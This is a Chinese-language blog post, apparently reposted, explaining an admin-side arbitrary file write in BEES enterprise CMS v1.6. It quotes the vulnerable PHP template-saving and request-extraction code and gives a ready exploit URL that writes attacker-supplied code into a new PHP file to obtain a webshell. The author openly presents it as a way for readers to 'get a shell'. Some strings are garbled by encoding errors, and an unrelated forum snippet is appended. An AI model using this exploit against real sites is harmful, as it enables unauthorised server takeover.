BEES 企业网站管理系统 v1.6 后台写 Shell 漏洞
By:风之传说
晚上无聊,然后呢到网上搜了下,无意中搜到此系统,于是就有了以下文章,方便大家以后拿SHELL。呵呵~!顺便和大家一起成长,一起学习。
我会将原程序解释的详细写,以便大家能看到漏洞的形成原因,能更进一步学习。
|
漏洞文件:/admin/admin_template.php:
define('IN_CMS','true');
include('init.php'); //包含此文件
$action=isset($action)?$action:'template'; //判断
$lang=isset($lang)?$lang:get_lang_main();同上
go_url($action);
.......
.......
.......
function save_template(){
if(!check_purview('tpl_manage')){msg('鎿嶄綔澶辫触,浣犵殑鏉冮檺涓嶈冻!');}
global $template,$file; //全局变量两个
$template=stripslashes($template);//还原转义前的字符
$path=CMS_PATH.$file; //路径 BY:风之传说
if(!$fp=@fopen($path,'w+')){err('');}
flock($fp,LOCK_EX);//锁定文件,防止别人控制$fp函数写SHELL。但是我们控制的不是此变量。因此可以绕过。
fwrite($fp,$template);//写文件。
flock($fp,LOCK_UN); //解除锁定
fclose($fp); //关闭文件
msg('銆?.$file.'銆戞ā鏉夸慨鏀瑰畬鎴?,'?');
}码
|
然后我们看看:/admin/init.php
|
/admin/init.php:
include(INC_PATH.'fun.php');
unset($HTTP_ENV_VARS, $HTTP_POST_VARS, $HTTP_GET_VARS, $HTTP_POST_FILES, $HTTP_COOKIE_VARS);
if (!get_magic_quotes_gpc()) //检测是否开启了转义 BY:风之传说
{
if (isset($_REQUEST))
{
$_REQUEST= addsl($_REQUEST); //这个函数是转义的意思。由fun.php定义。
}
$_COOKIE = addsl($_COOKIE);
$_POST = addsl($_POST);
$_GET = addsl($_GET);
} //以上都是转义提交的数据。
@extract($_POST);
@extract($_GET);
@extract($_COOKIE);
include(DATA_PATH.'confing.php');
|
漏洞利用:
http://localhost/admin/admin_template.php?action=save_template&file=fuck.php&template=代码
文章来源于lcx.cc:BEES企业网站管理系统 v1.6 后台写 Shell
相关推荐: 讨论:为什么如今的那么多手机客户端,比如说手机百度之类的,它们是如何盈利的
谁能解释一下为什么如今的那么多客户端(比如说手机百度之类的) 雅柏菲卡 (万物有灵,切忌污损。。。。。。) | 2014-03-20 17:27 会给比如说百度之类的互联网公司带来效益还是? [原文地址] 各种吐槽: 1# 小威 (呵呵复呵呵,女神敲回车!) …
评论